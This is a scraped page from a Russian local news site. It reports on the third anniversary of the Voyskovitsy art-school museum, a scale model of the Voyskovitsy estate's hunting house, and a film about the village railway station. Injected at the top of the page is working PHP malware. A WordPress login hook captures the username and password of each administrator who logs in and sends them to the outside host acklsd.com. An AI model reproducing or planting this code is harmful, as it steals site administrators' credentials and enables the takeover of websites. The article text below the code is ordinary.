if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Усадьба «Войсковицы»: история в миниатюре — Гатчинка.рф
Home » Поселения » Войсковицкое стерриториальное управление » Усадьба «Войсковицы»: история в миниатюре
Илья Маслов рассматривает макет

Усадьба «Войсковицы»: история в миниатюре

Стать маленьким и попасть внутрь кукольного домика — заветная мечта любого ребёнка. Даже если он уже стал взрослым. Это было видно по зачарованным лицам посетителей, которые разглядывали макет охотничьего дома усадьбы «Войсковицы».

Зрители в войсковицкой школе искусств

Макет представили гостям, пришедшим на день рождения музея Войсковицкой детской школы искусств.

— Вот уже исполняется три года, как мы открыли эти белоснежные двери. Приятно, что на дне рождения музея не только взрослые, но и дети. Ведь это для вас, ребята, мы стараемся хранить память о тех событиях, которые происходили в вашем родном посёлке, — сказал Александр Крушельницкий, директор Войсковицкой школы искусств.

Когда в 2018 году открывали музей, краевед Андрей Бурлаков говорил, что простор для работы в Войсковицах  огромный, и что у них с Александром  Дмитриевичем несколько интересных и масштабных замыслов.

На третью годовщину музея было представлено воплощение трёх идей: проект «Музей и дети», архитектурная реконструкция господского дома усадьбы «Войсковицы» и фильм «Войсковицы снимаются в кино».

Татьяна Артюх и Александр Крушельницкий

Татьяна Артюх и Александр Крушельницкий

Андрей Вячеславович рассказал, что работа над макетом длилась больше года. Для того, чтобы не погрешить против исторической правды, инициаторы опирались не только на фотографии, но и на подробные планы и чертежи, которые удалось найти в архивах Петербурга. Реконструкцию и 3D-моделирование выполнил архитектор Роман Крушельницкий, а макет изготовила компания «Пиар Макет» в масштабе 1:87.

— Это очень приближенная копия барского дома. Кстати, здесь есть электричество, — говорит краевед, щёлкая миниатюрным выключателем. — Многие удивляются, но это — историческая правда. В усадьбе, которую можно назвать охотничьей резиденцией государя, уже в те времена было электричество.

Ранее все интересные факты об истории усадьбы «Войсковицы» гостям сообщал лишь Андрей Бурлаков, но теперь у посетителей музея есть возможность услышать исторические сведения в изложении юных экскурсоводов. Ольга Захарова, преподаватель школы искусств по технике речи и руководитель проекта «Музей и дети», готовит войсковицких школьников к публичным выступлениям по разным темам: «Дворянские гнёзда», «Царская охота», «Железнодорожная станция и кино».

Юные экскурсоводы готовы к работе

Юные экскурсоводы готовы к работе

Последняя тема воплотилась в фильме, который представили и показали гостям. Андрей Вячеславович накопил немало краеведческого материала о работе кинематографистов на войсковицкой земле. «Главным героем» всех съёмок было здание железнодорожной станции. Эта старейшая станция в России, основанная в 1870 году на пути из Санкт-Петербурга в Ревель (Таллин) по Балтийской железной дороге, ещё недавно сохраняла свой первозданный, железнодорожный дух старины. Но в 2015 году, по приказу руководства РЖД, деревянный вокзал был снесён.

В фильме режиссёр Андрей Васильев рассказал о самых ярких кинематографических эпизодах, связанных с войсковицкой железнодорожной станцией. Например, здесь Никита Михалков снимал большой фрагмент фильма «Цитадель», в котором показана свадьба солдата-инвалида.

— Я рада, что мы вместе делаем одно важное дело — воспитываем у наших детей интерес к истории родного края, — сказала директор Войсковицкой школы №1 Татьяна Артюх. — Школьный музей сейчас закрыт на реконструкцию, поэтому я благодарна Александру Дмитриевичу и Андрею Вячеславовичу за то, что у школьников есть возможность бывать в музее «Усадьба Войсковицы» и изучать историю малой родины.

Фрагмент макета

Фрагмент макета

Педагог Крушельницкий и краевед Бурлаков уверены, что их небольшой музей стал большим и важным делом в культуре и просвещении жителей Войсковицкого поселения.

— Я думаю, что музей будет способствовать тому, чтобы дети, которые живут в Войсковицах, не уезжали из своего посёлка, а оставались на родной земле и гордились своей историей, — подвёл итог краевед и почётный гражданин Гатчинского района Андрей Бурлаков.

Алёна РЫБАКОВА

Альбом с фотографиями: https://vk.com/album-29998172_279801291

Recommended for you
Афиша Прекрасная Мельничиха
Такой «Мозаики» — ты не ври! — нет ни в Туле, ни в Твери

Именно так можно было бы перефразировать поэтическую строчку Леонида Филатова. Потому что такого удивительного детского...